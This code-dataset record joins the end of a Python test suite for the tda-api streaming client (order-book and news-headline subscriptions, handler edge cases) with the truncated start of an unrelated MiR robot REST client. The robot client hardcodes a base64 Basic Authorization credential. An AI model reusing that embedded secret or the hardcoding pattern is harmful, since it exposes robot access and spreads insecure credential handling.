'LISTED_BOOK', 'SUBS'))] await self.client.listed_book_subs(['GOOG', 'MSFT']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'LISTED_BOOK', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG,MSFT', 'fields': ('0,1,2,3') } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_listed_book_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'LISTED_BOOK', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.listed_book_subs(['GOOG', 'MSFT']) ########################################################################## # NASDAQ_BOOK @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_nasdaq_book_subs_success_all_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'NASDAQ_BOOK', 'SUBS'))] await self.client.nasdaq_book_subs(['GOOG', 'MSFT']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'NASDAQ_BOOK', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG,MSFT', 'fields': ('0,1,2,3') } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_nasdaq_book_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'NASDAQ_BOOK', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.nasdaq_book_subs(['GOOG', 'MSFT']) ########################################################################## # OPTIONS_BOOK @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_options_book_subs_success_all_fields(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'OPTIONS_BOOK', 'SUBS'))] await self.client.options_book_subs( ['GOOG_052920C620', 'MSFT_052920C145']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'OPTIONS_BOOK', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG_052920C620,MSFT_052920C145', 'fields': ('0,1,2,3') } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_options_book_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'OPTIONS_BOOK', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.options_book_subs( ['GOOG_052920C620', 'MSFT_052920C145']) ########################################################################## # Common book handler functionality @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_listed_book_handler(self, ws_connect): async def subs(): await self.client.listed_book_subs(['GOOG', 'MSFT']) def register_handler(): handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_listed_book_handler(handler) self.client.add_listed_book_handler(async_handler) return handler, async_handler return await self.__test_book_handler( ws_connect, 'LISTED_BOOK', subs, register_handler) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_nasdaq_book_handler(self, ws_connect): async def subs(): await self.client.nasdaq_book_subs(['GOOG', 'MSFT']) def register_handler(): handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_nasdaq_book_handler(handler) self.client.add_nasdaq_book_handler(async_handler) return handler, async_handler return await self.__test_book_handler( ws_connect, 'NASDAQ_BOOK', subs, register_handler) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_options_book_handler(self, ws_connect): async def subs(): await self.client.options_book_subs(['GOOG', 'MSFT']) def register_handler(): handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_options_book_handler(handler) self.client.add_options_book_handler(async_handler) return handler, async_handler return await self.__test_book_handler( ws_connect, 'OPTIONS_BOOK', subs, register_handler) @no_duplicates async def __test_book_handler( self, ws_connect, service, subs, register_handler): socket = await self.login_and_get_socket(ws_connect) stream_item = { 'data': [ { 'service': service, 'timestamp': 1590532470149, 'command': 'SUBS', 'content': [ { 'key': 'MSFT', '1': 1590532442608, '2': [ { '0': 181.77, '1': 100, '2': 1, '3': [ { '0': 'edgx', '1': 100, '2': 63150257 } ] }, { '0': 181.75, '1': 545, '2': 2, '3': [ { '0': 'NSDQ', '1': 345, '2': 62685730 }, { '0': 'arcx', '1': 200, '2': 63242588 } ] }, { '0': 157.0, '1': 100, '2': 1, '3': [ { '0': 'batx', '1': 100, '2': 63082708 } ] } ], '3': [ { '0': 181.95, '1': 100, '2': 1, '3': [ { '0': 'arcx', '1': 100, '2': 63006734 } ] }, { '0': 181.98, '1': 48, '2': 1, '3': [ { '0': 'NSDQ', '1': 48, '2': 62327464 } ] }, { '0': 182.3, '1': 100, '2': 1, '3': [ { '0': 'edgx', '1': 100, '2': 63192542 } ] }, { '0': 186.8, '1': 700, '2': 1, '3': [ { '0': 'batx', '1': 700, '2': 60412822 } ] } ] }, { 'key': 'GOOG', '1': 1590532323728, '2': [ { '0': 1418.0, '1': 1, '2': 1, '3': [ { '0': 'NSDQ', '1': 1, '2': 54335011 } ] }, { '0': 1417.26, '1': 100, '2': 1, '3': [ { '0': 'batx', '1': 100, '2': 62782324 } ] }, { '0': 1417.25, '1': 100, '2': 1, '3': [ { '0': 'arcx', '1': 100, '2': 62767878 } ] }, { '0': 1400.88, '1': 100, '2': 1, '3': [ { '0': 'edgx', '1': 100, '2': 54000952 } ] } ], '3': [ { '0': 1421.0, '1': 300, '2': 2, '3': [ { '0': 'edgx', '1': 200, '2': 56723908 }, { '0': 'arcx', '1': 100, '2': 62709059 } ] }, { '0': 1421.73, '1': 10, '2': 1, '3': [ { '0': 'NSDQ', '1': 10, '2': 62737731 } ] } ] } ] } ] } socket.recv.side_effect = [ json.dumps(self.success_response(1, service, 'SUBS')), json.dumps(stream_item)] await subs() handler, async_handler = register_handler() await self.client.handle_message() expected_item = { 'service': service, 'timestamp': 1590532470149, 'command': 'SUBS', 'content': [ { 'key': 'MSFT', 'BOOK_TIME': 1590532442608, 'BIDS': [ { 'BID_PRICE': 181.77, 'TOTAL_VOLUME': 100, 'NUM_BIDS': 1, 'BIDS': [ { 'EXCHANGE': 'edgx', 'BID_VOLUME': 100, 'SEQUENCE': 63150257 } ] }, { 'BID_PRICE': 181.75, 'TOTAL_VOLUME': 545, 'NUM_BIDS': 2, 'BIDS': [ { 'EXCHANGE': 'NSDQ', 'BID_VOLUME': 345, 'SEQUENCE': 62685730 }, { 'EXCHANGE': 'arcx', 'BID_VOLUME': 200, 'SEQUENCE': 63242588 } ] }, { 'BID_PRICE': 157.0, 'TOTAL_VOLUME': 100, 'NUM_BIDS': 1, 'BIDS': [ { 'EXCHANGE': 'batx', 'BID_VOLUME': 100, 'SEQUENCE': 63082708 } ] } ], 'ASKS': [ { 'ASK_PRICE': 181.95, 'TOTAL_VOLUME': 100, 'NUM_ASKS': 1, 'ASKS': [ { 'EXCHANGE': 'arcx', 'ASK_VOLUME': 100, 'SEQUENCE': 63006734 } ] }, { 'ASK_PRICE': 181.98, 'TOTAL_VOLUME': 48, 'NUM_ASKS': 1, 'ASKS': [ { 'EXCHANGE': 'NSDQ', 'ASK_VOLUME': 48, 'SEQUENCE': 62327464 } ] }, { 'ASK_PRICE': 182.3, 'TOTAL_VOLUME': 100, 'NUM_ASKS': 1, 'ASKS': [ { 'EXCHANGE': 'edgx', 'ASK_VOLUME': 100, 'SEQUENCE': 63192542 } ] }, { 'ASK_PRICE': 186.8, 'TOTAL_VOLUME': 700, 'NUM_ASKS': 1, 'ASKS': [ { 'EXCHANGE': 'batx', 'ASK_VOLUME': 700, 'SEQUENCE': 60412822 } ] } ] }, { 'key': 'GOOG', 'BOOK_TIME': 1590532323728, 'BIDS': [ { 'BID_PRICE': 1418.0, 'TOTAL_VOLUME': 1, 'NUM_BIDS': 1, 'BIDS': [ { 'EXCHANGE': 'NSDQ', 'BID_VOLUME': 1, 'SEQUENCE': 54335011 } ] }, { 'BID_PRICE': 1417.26, 'TOTAL_VOLUME': 100, 'NUM_BIDS': 1, 'BIDS': [ { 'EXCHANGE': 'batx', 'BID_VOLUME': 100, 'SEQUENCE': 62782324 } ] }, { 'BID_PRICE': 1417.25, 'TOTAL_VOLUME': 100, 'NUM_BIDS': 1, 'BIDS': [ { 'EXCHANGE': 'arcx', 'BID_VOLUME': 100, 'SEQUENCE': 62767878 } ] }, { 'BID_PRICE': 1400.88, 'TOTAL_VOLUME': 100, 'NUM_BIDS': 1, 'BIDS': [ { 'EXCHANGE': 'edgx', 'BID_VOLUME': 100, 'SEQUENCE': 54000952 } ] } ], 'ASKS': [ { 'ASK_PRICE': 1421.0, 'TOTAL_VOLUME': 300, 'NUM_ASKS': 2, 'ASKS': [ { 'EXCHANGE': 'edgx', 'ASK_VOLUME': 200, 'SEQUENCE': 56723908 }, { 'EXCHANGE': 'arcx', 'ASK_VOLUME': 100, 'SEQUENCE': 62709059 } ] }, { 'ASK_PRICE': 1421.73, 'TOTAL_VOLUME': 10, 'NUM_ASKS': 1, 'ASKS': [ { 'EXCHANGE': 'NSDQ', 'ASK_VOLUME': 10, 'SEQUENCE': 62737731 } ] } ] } ] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################## # NEWS_HEADLINE @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_news_headline_subs_success(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [json.dumps(self.success_response( 1, 'NEWS_HEADLINE', 'SUBS'))] await self.client.news_headline_subs(['GOOG', 'MSFT']) socket.recv.assert_awaited_once() request = self.request_from_socket_mock(socket) self.assertEqual(request, { 'account': '1001', 'service': 'NEWS_HEADLINE', 'command': 'SUBS', 'requestid': '1', 'source': 'streamerInfo-appId', 'parameters': { 'keys': 'GOOG,MSFT', 'fields': ('0,1,2,3,4,5,6,7,8,9,10') } }) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_news_headline_subs_failure(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) response = self.success_response(1, 'NEWS_HEADLINE', 'SUBS') response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [json.dumps(response)] with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.news_headline_subs(['GOOG', 'MSFT']) @no_duplicates # TODO: Replace this with real messages. @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_news_headline_handler(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = { 'data': [{ 'service': 'NEWS_HEADLINE', 'timestamp': 1590245129396, 'command': 'SUBS', 'content': [{ 'key': 'GOOG', 'delayed': False, '1': 0, '2': 1590181199727, '3': '0S21111333342', '4': 'Active', '5': 'Google Does Something', '6': '0S1113435443', '7': '1', '8': 'GOOG', '9': False, '10': 'Bloomberg', }, { 'key': 'MSFT', 'delayed': False, '1': 0, '2': 1590181199728, '3': '0S21111333343', '4': 'Active', '5': 'Microsoft Does Something', '6': '0S1113435444', '7': '2', '8': 'MSFT', '9': False, '10': 'WSJ', }] }] } socket.recv.side_effect = [ json.dumps(self.success_response(1, 'NEWS_HEADLINE', 'SUBS')), json.dumps(stream_item)] await self.client.news_headline_subs(['GOOG', 'MSFT']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_news_headline_handler(handler) self.client.add_news_headline_handler(async_handler) await self.client.handle_message() expected_item = { 'service': 'NEWS_HEADLINE', 'timestamp': 1590245129396, 'command': 'SUBS', 'content': [{ 'key': 'GOOG', 'delayed': False, 'ERROR_CODE': 0, 'STORY_DATETIME': 1590181199727, 'HEADLINE_ID': '0S21111333342', 'STATUS': 'Active', 'HEADLINE': 'Google Does Something', 'STORY_ID': '0S1113435443', 'COUNT_FOR_KEYWORD': '1', 'KEYWORD_ARRAY': 'GOOG', 'IS_HOT': False, 'STORY_SOURCE': 'Bloomberg', }, { 'key': 'MSFT', 'delayed': False, 'ERROR_CODE': 0, 'STORY_DATETIME': 1590181199728, 'HEADLINE_ID': '0S21111333343', 'STATUS': 'Active', 'HEADLINE': 'Microsoft Does Something', 'STORY_ID': '0S1113435444', 'COUNT_FOR_KEYWORD': '2', 'KEYWORD_ARRAY': 'MSFT', 'IS_HOT': False, 'STORY_SOURCE': 'WSJ', }] } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_news_headline_not_authorized_notification(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = { "notify": [ { "service": "NEWS_HEADLINE", "timestamp": 1591500923797, "content": { "code": 17, "msg": "Not authorized for all quotes." } } ] } socket.recv.side_effect = [ json.dumps(self.success_response(1, 'NEWS_HEADLINE', 'SUBS')), json.dumps(stream_item)] await self.client.news_headline_subs(['GOOG', 'MSFT']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_news_headline_handler(handler) self.client.add_news_headline_handler(async_handler) await self.client.handle_message() expected_item = { "service": "NEWS_HEADLINE", "timestamp": 1591500923797, "content": { "code": 17, "msg": "Not authorized for all quotes." } } self.assert_handler_called_once_with(handler, expected_item) self.assert_handler_called_once_with(async_handler, expected_item) ########################################################################### # Handler edge cases # # Note: We use CHART_EQUITY as a test case, which leaks the implementation # detail that the handler disasynctest.patching is implemented by a common component. # If this were to ever change, these tests will have to be revisited. @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_messages_received_while_awaiting_response(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = self.streaming_entry('CHART_EQUITY', 'SUBS') socket.recv.side_effect = [ json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')), json.dumps(stream_item), json.dumps(self.success_response(2, 'CHART_EQUITY', 'ADD'))] handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_chart_equity_handler(handler) self.client.add_chart_equity_handler(async_handler) await self.client.chart_equity_subs(['GOOG,MSFT']) await self.client.chart_equity_add(['INTC']) handler.assert_called_once_with(stream_item['data'][0]) async_handler.assert_called_once_with(stream_item['data'][0]) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_messages_received_while_awaiting_failed_response_bad_code( self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = self.streaming_entry('CHART_EQUITY', 'SUBS') failed_add_response = self.success_response(2, 'CHART_EQUITY', 'ADD') failed_add_response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [ json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')), json.dumps(stream_item), json.dumps(failed_add_response)] handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_chart_equity_handler(handler) self.client.add_chart_equity_handler(async_handler) await self.client.chart_equity_subs(['GOOG,MSFT']) with self.assertRaises(tda.streaming.UnexpectedResponseCode): await self.client.chart_equity_add(['INTC']) handler.assert_called_once_with(stream_item['data'][0]) async_handler.assert_called_once_with(stream_item['data'][0]) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_messages_received_while_receiving_unexpected_response( self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = self.streaming_entry('CHART_EQUITY', 'SUBS') failed_add_response = self.success_response(999, 'CHART_EQUITY', 'ADD') failed_add_response['response'][0]['content']['code'] = 21 socket.recv.side_effect = [ json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')), json.dumps(stream_item), json.dumps(failed_add_response)] handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_chart_equity_handler(handler) self.client.add_chart_equity_handler(async_handler) await self.client.chart_equity_subs(['GOOG,MSFT']) with self.assertRaises(tda.streaming.UnexpectedResponse): await self.client.chart_equity_add(['INTC']) handler.assert_called_once_with(stream_item['data'][0]) async_handler.assert_called_once_with(stream_item['data'][0]) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_messages_routing_from_multiple_coroutines( self, ws_connect): socket = await self.login_and_get_socket(ws_connect) handler_main = Mock() async def main_loop(self): self.client.add_chart_equity_handler(handler_main) await self.client.chart_equity_subs(['GOOG,MSFT']) await asyncio.sleep(0.3) await self.client.handle_message() handler_success = Mock() async def success_test(self): await asyncio.sleep(0.1) await self.client.account_activity_sub() handler_success() handler_failure = Mock() async def failure_test(self): await asyncio.sleep(0.2) try: await self.client.account_activity_sub() except tda.streaming.UnexpectedResponseCode: handler_failure() stream_item = self.streaming_entry('CHART_EQUITY', 'SUBS') failed_response = self.success_response(3, 'ACCT_ACTIVITY', 'SUBS') failed_response['response'][0]['content']['code'] = 21 async def delayedvalue(delay, value): await asyncio.sleep(delay) return value socket.recv.side_effect = [ delayedvalue(0, json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS'))), delayedvalue(0.3, json.dumps(failed_response)), delayedvalue(0.3, json.dumps(self.success_response(2, 'ACCT_ACTIVITY', 'SUBS'))), delayedvalue(0, json.dumps(stream_item))] await asyncio.gather( main_loop(self), success_test(self), failure_test(self)) handler_main.assert_called_once_with(stream_item['data'][0]) handler_success.assert_called_once() handler_failure.assert_called_once() @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_notify_heartbeat_messages_ignored(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [ json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')), json.dumps({'notify': [{'heartbeat': '1591499624412'}]})] await self.client.chart_equity_subs(['GOOG,MSFT']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_chart_equity_handler(handler) self.client.add_chart_equity_handler(async_handler) await self.client.handle_message() handler.assert_not_called() async_handler.assert_not_called() @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_handle_message_unexpected_response(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [ json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')), json.dumps(self.success_response(2, 'CHART_EQUITY', 'SUBS'))] await self.client.chart_equity_subs(['GOOG,MSFT']) with self.assertRaises(tda.streaming.UnexpectedResponse): await self.client.handle_message() @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_handle_message_unparsable_message(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) socket.recv.side_effect = [ json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')), '{"data":[{"service":"LEVELONE_FUTURES", ' + '"timestamp":1590248118165,"command":"SUBS",' + '"content":[{"key":"/GOOG","delayed":false,' + '"1":�,"2":�,"3":�,"6":"?","7":"?","12":�,"13":�,' + '"14":�,"15":"?","16":"Symbol not found","17":"?",' + '"18":�,"21":"unavailable","22":"Unknown","24":�,' '"28":"D,D","33":�}]}]}'] await self.client.chart_equity_subs(['GOOG,MSFT']) with self.assertRaises(tda.streaming.UnparsableMessage): await self.client.handle_message() @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_handle_message_multiple_handlers(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item_1 = self.streaming_entry('CHART_EQUITY', 'SUBS') socket.recv.side_effect = [ json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')), json.dumps(stream_item_1)] await self.client.chart_equity_subs(['GOOG,MSFT']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_chart_equity_handler(handler) self.client.add_chart_equity_handler(async_handler) await self.client.handle_message() handler.assert_called_once_with(stream_item_1['data'][0]) async_handler.assert_called_once_with(stream_item_1['data'][0]) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_multiple_data_per_message(self, ws_connect): socket = await self.login_and_get_socket(ws_connect) stream_item = self.streaming_entry( 'CHART_EQUITY', 'SUBS', [{'msg': 1}]) stream_item['data'].append(self.streaming_entry( 'CHART_EQUITY', 'SUBS', [{'msg': 2}])['data'][0]) socket.recv.side_effect = [ json.dumps(self.success_response(1, 'CHART_EQUITY', 'SUBS')), json.dumps(stream_item)] await self.client.chart_equity_subs(['GOOG,MSFT']) handler = Mock() async_handler = asynctest.CoroutineMock() self.client.add_chart_equity_handler(handler) self.client.add_chart_equity_handler(async_handler) await self.client.handle_message() handler.assert_has_calls( [call(stream_item['data'][0]), call(stream_item['data'][1])]) async_handler.assert_has_calls( [call(stream_item['data'][0]), call(stream_item['data'][1])]) @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_handle_message_without_login(self, ws_connect): with self.assertRaisesRegex(ValueError, '.*Socket not open.*'): await self.client.handle_message() @no_duplicates @asynctest.patch('tda.streaming.websockets.client.connect', new_callable=asynctest.CoroutineMock) async def test_subscribe_without_login(self, ws_connect): with self.assertRaisesRegex(ValueError, '.*Socket not open.*'): await self.client.chart_equity_subs(['GOOG,MSFT'])
39.013734
101
0.477171
933dc085dfb83128fdc163dcc30d8bd4a8446476
13,508
py
Python
strategy/scripts/mir_bridge/mir_bridge.py
andy-Chien/timda_dual_arm
94170d8889218ea0dc4e6031dcbbf59b7e37e70c
[ "MIT" ]
3
2020-02-17T12:56:22.000Z
2020-09-30T11:17:03.000Z
strategy/scripts/mir_bridge/mir_bridge.py
andy-Chien/timda_dual_arm
94170d8889218ea0dc4e6031dcbbf59b7e37e70c
[ "MIT" ]
2
2020-02-17T15:17:43.000Z
2021-05-11T21:01:26.000Z
strategy/scripts/mir_bridge/mir_bridge.py
andy-Chien/timda_dual_arm
94170d8889218ea0dc4e6031dcbbf59b7e37e70c
[ "MIT" ]
9
2021-02-01T08:20:53.000Z
2021-09-17T05:52:35.000Z
#!/usr/bin/python import re import json import requests import warnings import math import time import base64 import os from uuid import UUID MAP_NAME = "HOME_AREA" ## TODO: Try to use function to reconstruct path for decorator's argument 'path' class Request(object): def __init__(self, method, path): self.method = method.upper() self.path = path self.h = { "Content-Type": "application/json;charset=UTF-8", "Accept-Language": "en-US", "Authorization": "Basic ZGlzdHJpYnV0b3I6NjJmMmYwZjFlZmYxMGQzMTUyYzk1ZjZmMDU5NjU3NmU0ODJiYjhlNDQ4MDY0MzNmNGNmOTI5NzkyODM0YjAxNA==" } def __call__(self, f): def wrapper(obj, *args, **kwargs): payload = f(obj, *args, **kwargs) URL = "{}{}".format(obj.host, self.path) if payload is not None: if payload.has_key("PATH"): URL = "{}{}".format(URL, payload.get("PATH")) if payload.has_key("BODY"): payload = payload.get("BODY") try: res = requests.request(self.method, url=URL, headers=self.h, data=json.dumps(payload), timeout=3) except requests.RequestException as e: print(e) return else: try: res = requests.request(self.method, url=URL, headers=self.h, timeout=3) except requests.RequestException as e: print(e) return return res return wrapper class MIR(object): def __init__(self, host): if not "http" in host: warnings.warn("WARRING: Maybe the host name is error.") self.host = host def check_response_status_code(self, res): if str(res.status_code).startswith("20"): print("[Response OK]") else: raise Exception("Response ERROR") def is_valid_guid(self, guid_to_test, version=1): try: guid_obj = UUID(guid_to_test, version=version) except ValueError: return False return str(guid_obj) == guid_to_test @Request(method="get", path="/status") def get_status(self): pass @Request(method="put", path="/status") def set_status(self, set_state): STATE = {"Ready": 3, "Pause": 4} # Check whether input 'set_state' is correct if isinstance(set_state, (str, int)): if isinstance(set_state, str): s = STATE.get(set_state, 4) else: print("ERROR type of set_state") return body = { "state_id": s } return body @Request(method="get", path="/system/info") def get_system_info(self): pass @Request(method="get", path="/missions") def get_missions(self): pass def get_mission_guid(self, mission, auto_create=True): r = self.get_missions() rjson = json.loads(r.text) for l in rjson: if l.get("name") == mission: return l.get("guid") warnings.warn("No this mission") return None @Request(method="get", path="/missions") def get_mission_actions(self, mission): mission_guid = self.get_mission_guid(mission) if mission_guid is None: print("[WARNING] No this mission. Creating mission {}".format(mission)) r = self.create_new_mission(mission) rjson = json.loads(r.text) mission_guid = rjson.get("guid") return {"PATH": "/" + mission_guid + "/actions"} @Request(method="get", path="/mission_queue") def get_mission_queue(self): pass @Request(method="post", path="/mission_queue") def post_mission_queue(self, mission): body = { "mission_id": mission } return body def add_mission_to_queue(self, mission): if not self.is_valid_guid(mission): mission_id = self.get_mission_guid(mission) r = self.post_mission_queue(mission_id) self.check_response_status_code(r) @property def mission_queue_is_empty(self): r = self.get_mission_queue() rjson = json.loads(r.text) for l in rjson: if l.get("state").upper() == "PENDING" or \ l.get("state").upper() == "EXECUTING": return False return True @Request(method="delete", path="/mission_queue") def clear_mission_queue(self): pass @Request(method="get", path="/mission_groups") def get_groups(self): pass def get_group_guid(self, group): r = self.get_groups() rjson = json.loads(r.text) for l in rjson: if l.get("name") == group: return l.get("guid") warnings.warn("No this group") #print(r.text) return None @Request(method="get", path="/sessions") def get_sessions(self): pass def get_session_guid(self, session): r = self.get_sessions() rjson = json.loads(r.text) for l in rjson: if l.get("name") == session: return l.get("guid") warnings.warn("No this session") #print(r.text) return None @Request(method="post", path="/missions") def create_new_mission(self, name, group_id="TKU_IARC", session_id="TKU_IARC"): print("Creating new mission name: {}, group_id: {}, session_id: {}" \ .format(name, group_id, session_id)) if not self.is_valid_guid(group_id): group_id = self.get_group_guid(group_id) if not self.is_valid_guid(session_id): session_id = self.get_session_guid(session_id) body = { "group_id": group_id, "session_id": session_id, "name": name } return body @Request(method="delete", path="/missions") def delete_mission(self, mission): if not self.is_valid_guid(mission): mission_id = self.get_mission_guid(mission) if mission_id is None: warnings.warn("No this mission to DELETE") return return {"PATH": "/" + mission_id} @Request(method="post", path="/missions") def add_action_to_mission(self, mission, action_type, parameters, priority, scope_reference=None): mission_guid = self.get_mission_guid(mission) if mission_guid is None: print("[WARNING] No this mission. Creating mission {}".format(mission)) r = self.create_new_mission(mission) rjson = json.loads(r.text) mission_guid = rjson.get("guid") path = "/" + mission_guid + "/actions" body = { "action_type": action_type, "mission_id": mission_guid, "parameters": parameters, "priority": priority, "scope_reference": scope_reference } return {"PATH": path, "BODY": body} def add_try_catch_action(self, priority): param = [ { "id": "try", "value": ""}, { "id": "catch", "value": ""} ] self.add_action_to_mission("TKU_TMP", "try_catch", param, priority) def get_scope_reference_guid(self, mission, id): r = self.get_mission_actions(mission) rjson = json.loads(r.text) for l in rjson: for i in l.get("parameters"): if i.get("id") == id: return i.get("guid") warnings.warn("No scope_reference") return None def add_relative_move_action(self, dx=0.0, dy=0.0, dyaw=0.0, \ max_speed_v=0.5, max_speed_w=0.5, \ collision_detection=True, priority=1, \ use_try_catch=True): scope_reference = None param = [ { "id": "x", "value": dx}, { "id": "y", "value": dy}, { "id": "orientation", "value": dyaw}, { "id": "max_linear_speed", "value": max_speed_v}, { "id": "max_angular_speed", "value": max_speed_w}, { "id": "collision_detection", "value": collision_detection} ] if use_try_catch: self.add_try_catch_action(1) sound_param = [ { "id": "sound", "value": "mirconst-guid-0000-0001-sounds000000"}, { "id": "volume", "value": 80.0}, { "id": "mode", "value": "custom"}, { "id": "duration", "value": "00:00:03.000000"} ] scope_ref_try = self.get_scope_reference_guid("TKU_TMP", "try") scope_ref_catch = self.get_scope_reference_guid("TKU_TMP", "catch") self.add_action_to_mission("TKU_TMP", "sound", sound_param, 3, scope_ref_catch) self.add_action_to_mission("TKU_TMP", "relative_move", param, priority, scope_ref_catch) self.add_action_to_mission("TKU_TMP", "relative_move", param, priority, scope_ref_try) else: self.add_action_to_mission("TKU_TMP", "relative_move", param, priority) def relative_move(self, dx=0.0, dy=0.0, dyaw=0.0, \ max_speed_v=0.5, max_speed_w=0.5, collision_detection=True): self.clear_mission_queue() self.delete_mission("TKU_TMP") self.add_relative_move_action(dx, dy, dyaw, max_speed_v, max_speed_w, collision_detection, 1) self.add_mission_to_queue("TKU_TMP") @Request(method="get", path="/positions") def get_positions(self): pass @Request(method="get", path="/positions") def get_position_by_id(self, guid): return {"PATH": "/" + guid} def get_position_guid(self, position_name): r = self.get_positions() self.check_response_status_code(r) rjson = json.loads(r.text) for l in rjson: if l.get("name") == position_name: return l.get("guid") print("No this position") return None @Request(method="post", path="/positions") def add_position(self, name, x, y, yaw, position_type=0): map_guid = self.get_map_guid(MAP_NAME) body = { "map_id": map_guid, "name": name, "orientation": yaw, "pos_x": x, "pos_y": y, "type_id": position_type } return body @property def status(self): r = self.get_status() self.check_response_status_code(r) rjson = json.loads(r.text) d = { "mir_state": rjson.get("state_text").encode('utf-8'), "mir_position": { "x": rjson.get("position").get("x"), "y": rjson.get("position").get("y"), "yaw": rjson.get("position").get("orientation") } } return d ## Maybe this function is useless def arrived_position(self, position_name): id = self.get_position_guid(position_name) r = self.get_position_by_id(id) self.check_response_status_code(r) rjson = json.loads(r.text) if rjson.get("name") == position_name: rs = self.get_status() rsjson = json.loads(rs.text) dx = rjson.get("pos_x") - rsjson.get("position").get("x") dy = rjson.get("pos_y") - rsjson.get("position").get("y") dyaw = rjson.get("orientation") - 